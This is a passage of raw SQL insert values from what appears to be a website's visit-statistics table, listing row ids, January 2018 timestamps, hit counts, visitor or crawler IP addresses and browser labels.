(200887,1516670144,1,1,0,0,'87.250.224.77','other'),(200888,1516670176,1,1,0,0,'157.55.39.100','other'),(200889,1516670395,1,1,0,0,'37.9.113.74','other'),(200890,1516670931,1,1,0,0,'54.36.148.50','other'),(200891,1516670966,1,1,0,0,'54.36.148.63','other'),(200892,1516671384,1,1,0,0,'45.33.15.94','chrome'),(200893,1516671838,1,1,0,0,'54.36.148.20','other'),(200894,1516672085,1,1,0,0,'54.36.148.169','other'),(200895,1516672412,1,1,0,0,'40.77.167.95','other'),(200896,1516672559,1,1,0,0,'216.244.66.246','other'),(200897,1516672842,1,1,0,0,'54.36.148.232','other'),(200898,1516672899,1,1,0,0,'8.29.198.27','other'),(200899,1516672928,1,1,0,0,'178.154.200.8','other'),(200900,1516672987,1,1,0,0,'54.36.149.5','other'),(200901,1516673050,1,1,0,0,'162.210.196.130','other'),(200902,1516673260,1,1,0,0,'54.36.149.56','other'),(200903,1516673330,1,0,1,0,'66.249.69.99',''),(200904,1516673334,1,1,0,0,'54.36.148.202','other'),(200905,1516673673,1,1,0,0,'54.36.148.144','other'),(200906,1516674004,1,1,0,0,'54.36.148.135','other'),(200907,1516674212,1,1,0,0,'54.36.149.8','other'),(200908,1516674287,1,1,0,0,'54.36.148.25','other'),(200909,1516674387,1,1,0,0,'104.237.130.93','chrome'),(200910,1516674748,1,1,0,0,'54.36.148.124','other'),(200911,1516674989,1,1,0,0,'54.36.149.7','other'),(200912,1516675029,1,1,0,0,'54.36.148.88','other'),(200913,1516675517,1,1,0,0,'54.36.148.73','other'),(200914,1516675819,1,1,0,0,'54.36.148.71','other'),(200915,1516676143,1,1,0,0,'87.250.224.125','other'),(200916,1516676219,1,1,0,0,'54.36.148.52','other'),(200917,1516676259,1,1,0,0,'54.36.148.158','other'),(200918,1516676339,1,1,0,0,'54.36.149.87','other'),(200919,1516676541,1,1,0,0,'54.36.149.102','other'),(200920,1516676993,1,1,0,0,'54.36.148.79','other'),(200921,1516677037,1,1,0,0,'54.36.149.59','other'),(200922,1516677143,1,1,0,0,'54.36.148.244','other'),(200923,1516677263,1,1,0,0,'54.36.148.16','other'),(200924,1516677265,1,1,0,0,'54.36.148.42','other'),(200925,1516677299,1,1,0,0,'54.36.148.34','other'),(200926,1516677432,1,1,0,0,'213.180.203.7','other'),(200927,1516678014,1,1,0,0,'91.209.11.236','other'),(200928,1516678073,4,4,0,0,'216.244.66.246','other'),(200929,1516678119,1,1,0,0,'54.36.148.186','other'),(200930,1516678296,1,1,0,0,'54.36.149.34','other'),(200931,1516678463,2,2,0,0,'216.244.66.194','other'),(200932,1516679065,1,1,0,0,'54.36.149.7','other'),(200933,1516679098,1,1,0,0,'54.36.148.14','other'),(200934,1516679349,1,1,0,0,'54.36.148.201','other'),(200935,1516680064,3,3,0,0,'216.244.66.194','other'),(200936,1516680475,1,1,0,0,'54.36.149.35','other'),(200937,1516681007,1,1,0,0,'54.36.148.133','other'),(200938,1516681108,1,1,0,0,'51.255.71.115','other'),(200939,1516681330,1,1,0,0,'217.69.133.28','other'),(200940,1516681679,1,1,0,0,'54.36.149.64','other'),(200941,1516681716,41,41,0,0,'185.208.208.198','other'),(200942,1516682032,1,1,0,0,'54.36.148.241','other'),(200943,1516682051,1,1,0,0,'216.244.66.246','other'),(200944,1516682172,1,1,0,0,'54.36.148.137','other'),(200945,1516682173,1,1,0,0,'54.36.148.79','other'),(200946,1516682270,1,1,0,0,'54.36.148.207','other'),(200947,1516682475,1,0,1,0,'66.249.69.103',''),(200948,1516682943,1,1,0,0,'54.36.148.17','other'),(200949,1516683072,1,1,0,0,'217.69.133.245','other'),(200950,1516683728,1,1,0,0,'8.29.198.26','other'),(200951,1516685087,1,1,0,0,'54.36.148.161','other'),(200952,1516685347,1,1,0,0,'54.36.149.24','other'),(200953,1516685436,1,1,0,0,'54.36.148.242','other'),(200954,1516685473,1,1,0,0,'37.9.113.56','other'),(200955,1516685528,1,1,0,0,'54.36.148.254','other'),(200956,1516685893,1,0,1,0,'66.249.69.59',''),(200957,1516686107,1,1,0,0,'54.36.148.96','other'),(200958,1516686227,1,0,1,0,'66.249.69.105',''),(200959,1516686836,1,1,0,0,'54.36.149.105','other'),(200960,1516687078,1,1,0,0,'54.36.149.34','other'),(200961,1516687759,5,5,0,0,'216.244.66.246','other'),(200962,1516688143,1,1,0,0,'217.69.133.192','other'),(200963,1516688233,7,7,0,0,'216.244.66.194','other'),(200964,1516688349,1,1,0,0,'54.36.148.57','other'),(200965,1516688519,1,1,0,0,'193.108.50.39','chrome'),(200966,1516688612,1,1,0,0,'91.196.178.65','chrome'),(200967,1516688735,1,1,0,0,'91.192.135.241','firefox'),(200968,1516689001,1,1,0,0,'54.36.148.144','other'),(200969,1516689024,1,1,0,0,'54.36.148.62','other'),(200970,1516689445,1,1,0,0,'54.36.149.42','other'),(200971,1516689602,1,1,0,0,'82.207.121.233','chrome'),(200972,1516689800,1,1,0,0,'62.210.157.129','other'),(200973,1516690005,1,1,0,0,'51.255.71.119','other'),(200974,1516690083,1,1,0,0,'54.36.148.178','other'),(200975,1516690281,2,2,0,0,'216.244.66.194','other'),(200976,1516690365,2,2,0,0,'91.196.178.65','chrome'),(200977,1516690756,1,1,0,0,'91.196.178.93','chrome'),(200978,1516690832,1,1,0,0,'54.36.148.122','other'),(200979,1516691169,1,1,0,0,'54.36.148.131','other'),(200980,1516691177,1,1,0,0,'91.196.178.134','chrome'),(200981,1516691497,1,1,0,0,'37.54.23.194','chrome'),(200982,1516691842,1,1,0,0,'54.36.148.130','other'),(200983,1516692041,1,1,0,0,'54.36.149.100','other'),(200984,1516692698,1,1,0,0,'54.36.149.69','other'),(200985,1516692843,1,1,0,0,'54.36.148.169','other'),(200986,1516693037,1,0,1,0,'66.249.69.105',''),(200987,1516693085,1,1,0,0,'54.36.148.31','other'),(200988,1516693310,2,2,0,0,'216.244.66.246','other'),(200989,1516693435,1,1,0,0,'91.196.178.163','chrome'),(200990,1516693763,1,1,0,0,'54.36.148.246','other'),(200991,1516693773,1,1,0,0,'217.69.136.210','other'),(200992,1516693818,1,1,0,0,'54.36.148.197','other'),(200993,1516693855,1,1,0,0,'51.255.71.119','other'),(200994,1516694188,1,1,0,0,'95.220.16.55','chrome'),(200995,1516694560,1,1,0,0,'8.29.198.25','other'),(200996,1516694731,1,1,0,0,'54.36.148.54','other'),(200997,1516694763,1,1,0,0,'54.36.148.56','other'),(200998,1516694874,1,1,0,0,'91.209.11.236','other'),(200999,1516695016,1,1,0,0,'54.36.149.44','other'),(201000,1516695291,1,1,0,0,'91.196.178.167','chrome'),(201001,1516695512,1,1,0,0,'54.36.148.63','other'),(201002,1516695662,1,1,0,0,'54.36.149.83','other'),(201003,1516696301,1,1,0,0,'54.36.149.79','other'),(201004,1516697253,5,5,0,0,'216.244.66.246','other'),(201005,1516697267,1,1,0,0,'54.36.148.116','other'),(201006,1516697597,1,1,0,0,'54.36.149.84','other'),(201007,1516697669,1,1,0,0,'54.36.148.153','other'),(201008,1516697914,1,1,0,0,'54.36.148.13','other'),(201009,1516698345,1,1,0,0,'54.36.148.245','other'),(201010,1516698351,4,4,0,0,'216.244.66.194','other'),(201011,1516698381,1,1,0,0,'185.76.69.18','chrome'),(201012,1516698514,1,1,0,0,'80.70.77.152','chrome'),(201013,1516698681,1,1,0,0,'14.215.176.18','firefox'),(201014,1516698806,1,1,0,0,'95.132.2.223','firefox'),(201015,1516699045,1,1,0,0,'91.196.178.167','chrome'),(201016,1516699562,1,1,0,0,'54.36.148.120','other'),(201017,1516699637,1,1,0,0,'54.36.148.39','other'),(201018,1516699731,1,1,0,0,'66.249.69.57','chrome'),(201019,1516699809,1,1,0,0,'54.36.148.66','other'),(201020,1516699864,1,0,1,0,'66.249.69.105',''),(201021,1516699867,1,0,1,0,'66.249.69.99',''),(201022,1516700044,1,1,0,0,'54.36.149.0','other'),(201023,1516700263,1,1,0,0,'54.36.149.33','other'),(201024,1516700441,5,5,0,0,'216.244.66.194','other'),(201025,1516700646,1,1,0,0,'54.36.148.53','other'),(201026,1516700659,1,1,0,0,'62.80.160.205','chrome'),(201027,1516700708,1,1,0,0,'91.196.177.46','chrome'),(201028,1516700929,1,1,0,0,'54.36.148.185','other'),(201029,1516701023,1,1,0,0,'54.36.148.59','other'),(201030,1516701101,1,1,0,0,'54.36.148.158','other'),(201031,1516701154,1,1,0,0,'54.36.148.168','other'),(201032,1516701276,1,1,0,0,'66.249.69.103','chrome'),(201033,1516701277,1,1,0,0,'54.36.149.63','other'),(201034,1516701840,1,1,0,0,'54.36.148.65','other'),(201035,1516701982,2,2,0,0,'88.198.54.49','other'),(201036,1516702106,1,1,0,0,'54.36.148.39','other'),(201037,1516702121,1,1,0,0,'91.209.11.236','other'),(201038,1516703381,1,1,0,0,'37.53.231.62','chrome'),(201039,1516703473,5,5,0,0,'216.244.66.246','other'),(201040,1516703767,1,0,1,0,'66.249.69.99',''),(201041,1516703790,1,1,0,0,'54.36.149.40','other'),(201042,1516703986,1,1,0,0,'51.255.71.119','other'),(201043,1516704064,1,1,0,0,'54.36.149.95','other'),(201044,1516704085,1,1,0,0,'66.249.69.105','chrome'),(201045,1516704100,1,1,0,0,'66.249.69.99','chrome'),(201046,1516704121,1,1,0,0,'91.196.178.85','chrome'),(201047,1516704232,1,1,0,0,'54.36.148.142','other'),(201048,1516704506,1,1,0,0,'91.196.177.46','firefox'),(201049,1516704797,1,1,0,0,'54.36.148.63','other'),(201050,1516705263,1,1,0,0,'54.36.148.89','other'),(201051,1516705402,1,1,0,0,'8.29.198.26','other'),(201052,1516705560,1,1,0,0,'54.36.148.25','other'),(201053,1516705659,1,1,0,0,'91.196.178.131','firefox'),(201054,1516705875,1,1,0,0,'54.36.149.39','other'),(201055,1516705964,1,1,0,0,'66.249.69.59','chrome'),(201056,1516706110,1,1,0,0,'54.36.148.159','other'),(201057,1516706155,1,1,0,0,'54.36.149.24','other'),(201058,1516706187,1,1,0,0,'78.111.190.178','chrome'),(201059,1516706360,1,1,0,0,'54.36.148.240','other'),(201060,1516707208,1,1,0,0,'178.154.171.24','other'),(201061,1516707284,1,1,0,0,'54.36.148.20','other'),(201062,1516707801,1,1,0,0,'54.36.148.19','other'),(201063,1516708674,1,1,0,0,'54.36.148.236','other'),(201064,1516708720,1,1,0,0,'54.36.149.34','other'),(201065,1516709076,4,4,0,0,'216.244.66.194','other'),(201066,1516709135,1,1,0,0,'54.36.148.118','other'),(201067,1516709427,1,1,0,0,'54.36.148.11','other'),(201068,1516709585,1,1,0,0,'54.36.148.168','other'),(201069,1516709798,1,1,0,0,'194.126.224.48','chrome'),(201070,1516709876,1,1,0,0,'54.36.148.150','other'),(201071,1516710200,1,0,1,0,'66.249.69.105',''),(201072,1516710522,1,1,0,0,'54.36.149.101','other'),(201073,1516710644,1,1,0,0,'54.36.148.133','other'),(201074,1516710997,1,1,0,0,'77.93.41.218','chrome'),(201075,1516711016,1,1,0,0,'54.36.148.242','other'),(201076,1516711269,1,1,0,0,'91.196.178.93','chrome'),(201077,1516711297,1,1,0,0,'137.74.207.170','other'),(201078,1516711308,1,1,0,0,'130.180.209.63','chrome'),(201079,1516711484,1,1,0,0,'54.36.149.34','other'),(201080,1516711491,5,5,0,0,'216.244.66.194','other'),(201081,1516711645,1,1,0,0,'91.196.178.98','chrome'),(201082,1516711871,1,1,0,0,'91.196.178.65','chrome'),(201083,1516711876,1,1,0,0,'91.196.178.165','chrome'),(201084,1516712023,1,1,0,0,'54.36.148.193','other'),(201085,1516712030,1,0,1,0,'66.249.69.103',''),(201086,1516712036,1,1,0,0,'54.36.148.64','other'),(201087,1516712255,1,1,0,0,'88.81.248.62','chrome'),(201088,1516712410,1,1,0,0,'54.36.149.3','other'),(201089,1516712417,1,1,0,0,'46.201.162.42','chrome'),(201090,1516712600,1,1,0,0,'91.196.179.134','chrome'),(201091,1516712697,1,1,0,0,'91.196.178.98','chrome'),(201092,1516713087,1,1,0,0,'162.210.196.129','other'),(201093,1516713351,1,1,0,0,'176.111.33.18','firefox'),(201094,1516713406,1,1,0,0,'216.244.66.246','other'),(201095,1516713640,1,1,0,0,'54.36.148.31','other'),(201096,1516713657,1,1,0,0,'91.196.178.65','chrome'),(201097,1516713883,1,1,0,0,'91.196.178.165','chrome'),(201098,1516714016,1,1,0,0,'77.111.244.23','chrome'),(201099,1516714408,1,1,0,0,'91.196.178.79','chrome'),(201100,1516714486,1,1,0,0,'54.36.148.57','other'),(201101,1516714501,1,1,0,0,'54.36.148.245','other'),(201102,1516714612,1,1,0,0,'51.255.71.133','other'),(201103,1516714667,1,1,0,0,'54.36.148.114','other'),(201104,1516715111,3,3,0,0,'188.165.214.26','other'),(201105,1516715164,1,1,0,0,'216.244.65.58','chrome'),(201106,1516715458,1,1,0,0,'54.36.148.185','other'),(201107,1516715670,1,1,0,0,'54.36.149.56','other'),(201108,1516715671,4,4,0,0,'91.121.86.136','other'),(201109,1516715720,1,1,0,0,'54.36.148.53','other'),(201110,1516715778,1,1,0,0,'54.36.149.14','other'),(201111,1516716030,1,1,0,0,'54.36.148.171','other'),(201112,1516716100,1,1,0,0,'54.36.149.51','other'),(201113,1516716173,1,1,0,0,'91.196.178.163','firefox'),(201114,1516716177,1,1,0,0,'91.196.178.163','chrome'),(201115,1516716233,1,1,0,0,'8.29.198.27','other'),(201116,1516716663,1,1,0,0,'54.36.148.45','other'),(201117,1516716757,1,1,0,0,'54.36.148.133','other'),(201118,1516716763,1,1,0,0,'217.69.133.233','other'),(201119,1516716853,1,1,0,0,'54.36.148.134','other'),(201120,1516717081,1,1,0,0,'51.255.71.127','other'),(201121,1516717244,1,1,0,0,'5.83.23.13','chrome'),(201122,1516717443,1,1,0,0,'54.36.149.100','other'),(201123,1516717912,1,0,1,0,'66.249.69.99',''),(201124,1516718050,1,1,0,0,'178.95.245.143','chrome'),(201125,1516718051,1,1,0,0,'95.108.213.24','other'),(201126,1516718052,1,1,0,0,'37.9.113.60','other'),(201127,1516718132,1,1,0,0,'94.179.43.226','chrome'),(201128,1516718186,1,1,0,0,'54.36.149.5','other'),(201129,1516718241,1,1,0,0,'91.196.178.77','firefox'),(201130,1516718564,1,1,0,0,'180.76.15.158','other'),(201131,1516718590,2,2,0,0,'93.185.213.56','chrome'),(201132,1516718990,1,1,0,0,'37.9.113.63','other'),(201133,1516719292,1,1,0,0,'91.196.178.65','chrome'),(201134,1516719434,1,1,0,0,'51.255.71.131','other'),(201135,1516719474,1,1,0,0,'91.196.177.15','chrome'),(201136,1516719560,1,1,0,0,'91.196.178.131','firefox'),(201137,1516719612,1,0,1,0,'66.249.69.103',''),(201138,1516719684,1,1,0,0,'216.244.66.246','other'),(201139,1516719800,2,2,0,0,'216.244.66.194','other'),(201140,1516720867,1,1,0,0,'91.196.177.15','chrome'),(201141,1516721559,3,3,0,0,'216.244.66.194','other'),(201142,1516721943,1,1,0,0,'157.55.39.100','other'),(201143,1516722226,1,1,0,0,'54.36.149.81','other'),(201144,1516722258,1,1,0,0,'188.230.43.254','other'),(201145,1516722259,1,1,0,0,'54.36.148.145','other'),(201146,1516722334,1,1,0,0,'95.132.15.91','chrome'),(201147,1516722668,1,1,0,0,'217.69.133.249','other'),(201148,1516722787,1,1,0,0,'54.36.148.251','other'),(201149,1516722837,1,1,0,0,'91.196.178.132','chrome'),(201150,1516723362,1,1,0,0,'157.55.39.72','other'),(201151,1516723372,1,1,0,0,'54.36.148.111','other'),(201152,1516723437,3,3,0,0,'216.244.66.246','other'),(201153,1516723614,1,1,0,0,'54.36.149.63','other'),(201154,1516724236,1,1,0,0,'54.36.148.88','other'),(201155,1516724246,1,1,0,0,'194.44.45.139','chrome'),(201156,1516724320,1,0,1,0,'66.249.69.103',''),(201157,1516724380,1,1,0,0,'54.36.148.55','other'),(201158,1516724632,1,1,0,0,'188.230.43.254','other'),(201159,1516725117,1,1,0,0,'217.69.133.72','other'),(201160,1516725266,1,0,1,0,'66.249.69.57',''),(201161,1516725419,1,1,0,0,'54.36.148.76','other'),(201162,1516725460,1,1,0,0,'54.36.148.38','other'),(201163,1516725504,1,1,0,0,'37.54.114.23','chrome'),(201164,1516725888,1,1,0,0,'54.36.149.65','other'),(201165,1516725982,1,1,0,0,'91.196.178.35','chrome'),(201166,1516726133,1,1,0,0,'54.36.148.15','other'),(201167,1516726145,1,1,0,0,'46.211.4.217','other'),(201168,1516726316,6,6,0,0,'178.154.171.88','other'),(201169,1516726317,5,5,0,0,'141.8.142.74','other'),(201170,1516726463,1,1,0,0,'54.36.149.74','other'),(201171,1516726584,1,1,0,0,'137.74.207.170','other'),(201172,1516726954,1,1,0,0,'54.36.149.69','other'),(201173,1516727034,1,1,0,0,'188.230.43.254','other'),(201174,1516727067,1,1,0,0,'8.29.198.27','other'),(201175,1516727201,1,1,0,0,'51.255.71.123','other'),(201176,1516727255,1,1,0,0,'54.36.148.171','other'),(201177,1516727667,4,4,0,0,'141.8.142.74','other'),(201178,1516727781,1,1,0,0,'54.36.148.66','other'),(201179,1516728269,1,1,0,0,'54.36.148.82','other'),(201180,1516728288,3,3,0,0,'178.154.171.88','other'),(201181,1516728387,1,1,0,0,'54.36.149.102','other'),(201182,1516728738,1,1,0,0,'54.36.148.160','other'),(201183,1516728927,3,3,0,0,'141.8.142.74','other'),(201184,1516729135,2,2,0,0,'216.244.66.194','other'),(201185,1516729433,1,1,0,0,'188.230.43.254','other'),(201186,1516729465,1,1,0,0,'91.196.178.24','chrome'),(201187,1516729490,5,5,0,0,'216.244.66.246','other'),(201188,1516729806,1,1,0,0,'54.36.148.10','other'),(201189,1516729918,1,1,0,0,'54.36.148.110','other'),(201190,1516730023,1,1,0,0,'95.164.69.10','chrome'),(201191,1516730035,1,1,0,0,'66.249.69.105','chrome'),(201192,1516730160,1,1,0,0,'54.36.148.246','other'),(201193,1516730204,4,4,0,0,'178.154.171.88','other'),(201194,1516730232,1,1,0,0,'54.36.148.152','other'),(201195,1516730310,4,4,0,0,'69.163.216.126','other'),(201196,1516730363,2,2,0,0,'128.30.52.140','other'),(201197,1516730384,1,1,0,0,'173.203.121.97','other'),(201198,1516730401,1,1,0,0,'95.170.73.141','other'),(201199,1516730480,1,1,0,0,'54.36.149.51','other'),(201200,1516730853,2,2,0,0,'141.8.142.74','other'),(201201,1516731150,1,1,0,0,'91.209.11.236','other'),(201202,1516731194,1,1,0,0,'51.255.71.133','other'),(201203,1516731388,1,1,0,0,'54.36.148.55','other'),(201204,1516731812,3,3,0,0,'216.244.66.194','other'),(201205,1516731844,1,1,0,0,'54.36.148.99','other'),(201206,1516732245,4,4,0,0,'141.8.142.74','other'),(201207,1516732879,1,1,0,0,'217.69.133.68','other'),(201208,1516733165,1,1,0,0,'54.36.148.101','other'),(201209,1516733248,1,1,0,0,'54.36.148.189','other'),(201210,1516733602,1,1,0,0,'178.154.171.88','other'),(201211,1516733605,1,1,0,0,'141.8.142.74','other'),(201212,1516733656,1,0,1,0,'66.249.69.41',''),(201213,1516733762,2,2,0,0,'216.244.66.246','other'),(201214,1516734299,2,2,0,0,'87.250.224.46','other'),(201215,1516734302,1,1,0,0,'37.9.113.101','other'),(201216,1516734823,1,1,0,0,'40.77.167.58','other'),(201217,1516734917,1,1,0,0,'217.69.133.235','other'),(201218,1516734970,1,1,0,0,'95.132.135.218','firefox'),(201219,1516735002,1,1,0,0,'178.154.171.88','other'),(201220,1516735070,1,1,0,0,'40.77.167.50','other'),(201221,1516735133,1,1,0,0,'46.161.9.52','chrome'),(201222,1516735827,1,1,0,0,'51.255.71.116','other'),(201223,1516735935,2,2,0,0,'141.8.142.74','other'),(201224,1516735964,1,1,0,0,'54.36.148.57','other'),(201225,1516736105,1,1,0,0,'91.196.178.38','chrome'),(201226,1516736213,1,1,0,0,'54.36.148.59','other'),(201227,1516736459,1,1,0,0,'54.36.148.178','other'),(201228,1516736891,1,1,0,0,'178.154.171.88','other'),(201229,1516736981,1,1,0,0,'157.55.39.72','other'),(201230,1516737303,1,1,0,0,'54.36.148.200','other'),(201231,1516737338,1,1,0,0,'54.36.149.84','other'),(201232,1516737777,2,0,2,0,'68.180.229.52',''),(201233,1516737868,1,1,0,0,'178.154.171.88','other'),(201234,1516737871,1,1,0,0,'141.8.142.74','other'),(201235,1516737898,1,1,0,0,'8.29.198.25','other'),(201236,1516737993,1,1,0,0,'54.36.148.14','other'),(201237,1516738082,1,1,0,0,'91.196.178.61','chrome'),(201238,1516738086,1,1,0,0,'54.36.148.45','other'),(201239,1516738262,1,1,0,0,'46.161.9.52','chrome'),(201240,1516738271,1,1,0,0,'54.36.149.81','other'),(201241,1516738429,1,1,0,0,'54.36.149.32','other'),(201242,1516738784,1,1,0,0,'54.36.149.16','other'),(201243,1516738905,1,1,0,0,'95.132.135.155','firefox'),(201244,1516739106,1,1,0,0,'178.154.171.88','other'),(201245,1516739305,1,1,0,0,'141.8.142.74','other'),(201246,1516739361,1,1,0,0,'54.36.149.7','other'),(201247,1516739409,1,1,0,0,'91.196.178.168','chrome'),(201248,1516739441,1,1,0,0,'54.36.148.100','other'),(201249,1516739759,1,1,0,0,'54.36.149.9','other'),(201250,1516739882,1,0,1,0,'68.180.229.52',''),(201251,1516739975,1,1,0,0,'54.36.149.33','other'),(201252,1516740097,1,1,0,0,'178.154.171.88','other'),(201253,1516740115,1,1,0,0,'37.73.198.58','chrome'),(201254,1516740195,1,1,0,0,'51.255.71.129','other'),(201255,1516740312,1,1,0,0,'40.77.167.58','other'),(201256,1516740532,1,1,0,0,'54.36.148.168','other'),(201257,1516740614,1,1,0,0,'54.36.148.243','other'),(201258,1516740821,1,1,0,0,'78.111.190.65','chrome'),(201259,1516740829,1,1,0,0,'54.36.149.93','other'),(201260,1516741112,1,1,0,0,'141.8.142.74','other'),(201261,1516741135,1,1,0,0,'54.36.149.73','other'),(201262,1516741491,1,1,0,0,'54.36.148.235','other'),(201263,1516741571,3,3,0,0,'216.244.66.246','other'),(201264,1516741780,1,1,0,0,'157.55.39.72','other'),(201265,1516741845,3,3,0,0,'216.244.66.194','other'),(201266,1516741876,1,1,0,0,'66.249.69.39','chrome'),(201267,1516742138,1,1,0,0,'87.250.224.46','other'),(201268,1516742595,1,1,0,0,'54.36.148.176','other'),(201269,1516742785,1,1,0,0,'51.255.71.120','other'),(201270,1516743171,2,2,0,0,'141.8.142.74','other'),(201271,1516743189,1,1,0,0,'54.36.149.26','other'),(201272,1516743275,1,1,0,0,'54.36.148.185','other'),(201273,1516743621,1,1,0,0,'54.36.148.47','other'),(201274,1516743668,1,1,0,0,'66.102.9.35','chrome'),(201275,1516743699,1,1,0,0,'54.36.149.85','other'),(201276,1516743826,1,1,0,0,'54.36.148.109','other'),(201277,1516743975,1,1,0,0,'54.36.148.107','other'),(201278,1516744206,1,1,0,0,'178.154.171.88','other'),(201279,1516744787,1,1,0,0,'54.36.148.18','other'),(201280,1516744897,1,1,0,0,'54.36.149.20','other'),(201281,1516745007,1,1,0,0,'213.180.203.8','other'),(201282,1516745120,1,1,0,0,'54.36.148.120','other'),(201283,1516745565,1,1,0,0,'54.36.148.101','other'),(201284,1516745703,1,1,0,0,'54.36.148.241','other'),(201285,1516745735,1,1,0,0,'54.36.149.50','other'),(201286,1516746084,1,1,0,0,'141.8.142.74','other'),(201287,1516746134,1,0,1,0,'66.249.69.91',''),(201288,1516746245,4,4,0,0,'216.244.66.246','other'),(201289,1516747101,1,1,0,0,'178.154.171.88','other'),(201290,1516748102,1,1,0,0,'178.154.171.88','other'),(201291,1516748731,1,1,0,0,'8.29.198.27','other'),(201292,1516749079,1,1,0,0,'217.69.133.84','other'),(201293,1516749165,1,1,0,0,'141.8.142.74','other'),(201294,1516750129,4,4,0,0,'216.244.66.194','other'),(201295,1516750206,1,1,0,0,'40.77.167.34','other'),(201296,1516750249,1,1,0,0,'141.8.142.74','other'),(201297,1516751152,1,1,0,0,'141.8.142.74','other'),(201298,1516751183,3,3,0,0,'216.244.66.246','other'),(201299,1516751624,4,4,0,0,'216.244.66.194','other'),(201300,1516751651,1,1,0,0,'178.154.171.88','other'),(201301,1516752269,1,1,0,0,'141.8.142.74','other'),(201302,1516752833,2,0,2,0,'66.249.69.41',''),(201303,1516753065,1,0,1,0,'66.249.69.35',''),(201304,1516753685,1,1,0,0,'141.8.142.74','other'),(201305,1516755145,1,1,0,0,'178.154.171.88','other'),(201306,1516756390,1,1,0,0,'217.69.133.60','other'),(201307,1516756393,3,3,0,0,'178.154.171.88','other'),(201308,1516756475,1,1,0,0,'216.244.66.246','other'),(201309,1516756647,1,0,1,0,'66.249.66.199',''),(201310,1516757849,1,0,1,0,'66.249.66.156',''),(201311,1516757866,1,1,0,0,'141.8.142.74','other'),(201312,1516759276,1,1,0,0,'87.250.224.46','other'),(201313,1516759558,1,1,0,0,'8.29.198.26','other'),(201314,1516759703,1,1,0,0,'35.153.194.162','other'),(201315,1516760403,1,1,0,0,'91.209.11.236','other'),(201316,1516760434,1,1,0,0,'216.244.66.194','other'),(201317,1516760722,1,1,0,0,'141.8.142.74','other'),(201318,1516761894,1,1,0,0,'207.46.13.110','other'),(201319,1516762066,1,1,0,0,'178.154.171.88','other'),(201320,1516762086,4,4,0,0,'216.244.66.246','other'),(201321,1516762661,1,1,0,0,'37.204.189.221','msie'),(201322,1516763203,1,1,0,0,'91.209.11.236','other'),(201323,1516763367,1,1,0,0,'141.8.142.74','other'),(201324,1516764330,1,1,0,0,'178.154.171.88','other'),(201325,1516764765,1,1,0,0,'141.8.142.74','other'),(201326,1516765912,2,2,0,0,'178.154.171.88','other'),(201327,1516766254,7,7,0,0,'88.198.16.12','other'),(201328,1516766301,2,2,0,0,'216.244.66.246','other'),(201329,1516766561,2,2,0,0,'141.8.142.74','other'),(201330,1516766670,1,1,0,0,'207.46.13.110','other'),(201331,1516767019,1,1,0,0,'217.69.133.12','other'),(201332,1516767974,1,1,0,0,'107.167.108.192','other'),(201333,1516768352,1,1,0,0,'141.8.142.74','other'),(201334,1516769585,1,1,0,0,'141.8.142.74','other'),(201335,1516770082,1,1,0,0,'91.209.11.236','other'),(201336,1516770214,1,1,0,0,'178.154.171.88','other'),(201337,1516770225,1,1,0,0,'157.55.39.96','other'),(201338,1516770400,1,1,0,0,'8.29.198.27','other'),(201339,1516770670,3,3,0,0,'216.244.66.194','other'),(201340,1516771388,1,1,0,0,'141.8.142.74','other'),(201341,1516771443,1,1,0,0,'91.209.11.236','other'),(201342,1516771780,1,1,0,0,'31.202.112.183','firefox'),(201343,1516771874,3,3,0,0,'216.244.66.194','other'),(201344,1516771903,3,3,0,0,'216.244.66.246','other'),(201345,1516772294,1,1,0,0,'66.249.66.20','chrome'),(201346,1516772544,1,1,0,0,'141.8.142.74','other'),(201347,1516773298,3,3,0,0,'158.69.252.176','other'),(201348,1516773857,1,1,0,0,'141.8.142.74','other'),(201349,1516774501,1,1,0,0,'178.92.249.11','firefox'),(201350,1516774794,1,1,0,0,'217.69.133.251','other'),(201351,1516774889,1,1,0,0,'66.249.66.221','chrome'),(201352,1516774959,1,1,0,0,'141.8.142.74','other'),(201353,1516775048,1,1,0,0,'66.249.66.156','chrome'),(201354,1516776090,1,1,0,0,'141.8.142.74','other'),(201355,1516776285,1,1,0,0,'91.196.178.65','chrome'),(201356,1516776499,1,1,0,0,'91.196.177.46','chrome'),(201357,1516777015,1,0,1,0,'66.249.66.217',''),(201358,1516777096,2,2,0,0,'216.244.66.246','other'),(201359,1516777219,1,1,0,0,'141.8.142.74','other'),(201360,1516777332,1,1,0,0,'159.224.223.10','chrome'),(201361,1516778362,1,1,0,0,'141.8.142.74','other'),(201362,1516778941,1,1,0,0,'194.50.125.168','opera'),(201363,1516779359,1,1,0,0,'91.196.178.163','chrome'),(201364,1516779609,1,1,0,0,'141.8.142.74','other'),(201365,1516779654,1,1,0,0,'91.209.11.236','other'),(201366,1516780073,1,1,0,0,'91.196.178.133','chrome'),(201367,1516780334,1,1,0,0,'216.244.66.194','other'),(201368,1516780436,1,1,0,0,'91.196.178.163','chrome'),(201369,1516780818,1,1,0,0,'141.8.142.74','other'),(201370,1516781215,4,4,0,0,'216.244.66.246','other'),(201371,1516781224,1,1,0,0,'8.29.198.27','other'),(201372,1516781358,1,1,0,0,'95.132.2.223','firefox'),(201373,1516781390,1,1,0,0,'40.77.167.34','other'),(201374,1516781465,1,1,0,0,'91.209.11.236','other'),(201375,1516781791,1,1,0,0,'217.69.133.70','other'),(201376,1516781848,5,5,0,0,'216.244.66.194','other'),(201377,1516782181,1,1,0,0,'141.8.142.74','other'),(201378,1516782878,1,1,0,0,'91.196.178.167','chrome'),(201379,1516782908,1,0,1,0,'66.249.66.155',''),(201380,1516783444,1,1,0,0,'91.196.178.67','chrome'),(201381,1516783546,1,1,0,0,'141.8.142.74','other'),(201382,1516784092,1,1,0,0,'91.196.178.103','firefox'),(201383,1516784490,1,1,0,0,'159.224.223.10','chrome'),(201384,1516784727,1,1,0,0,'91.211.132.60','chrome'),(201385,1516784910,1,1,0,0,'141.8.142.74','other'),(201386,1516784914,1,1,0,0,'178.154.171.88','other'),(201387,1516785163,1,1,0,0,'40.77.167.47','other'),(201388,1516785498,1,1,0,0,'91.196.178.100','firefox'),(201389,1516785878,1,0,1,0,'66.249.66.156',''),(201390,1516785903,1,1,0,0,'91.196.178.35','chrome'),(201391,1516786266,3,3,0,0,'141.8.142.74','other'),(201392,1516786446,2,2,0,0,'178.154.171.88','other'),(201393,1516786579,1,1,0,0,'216.244.66.246','other'),(201394,1516787594,2,2,0,0,'141.8.142.74','other'),(201395,1516787876,1,1,0,0,'66.249.66.199','chrome'),(201396,1516788297,1,1,0,0,'91.196.178.132','firefox'),(201397,1516788721,2,2,0,0,'62.210.157.95','other'),(201398,1516788762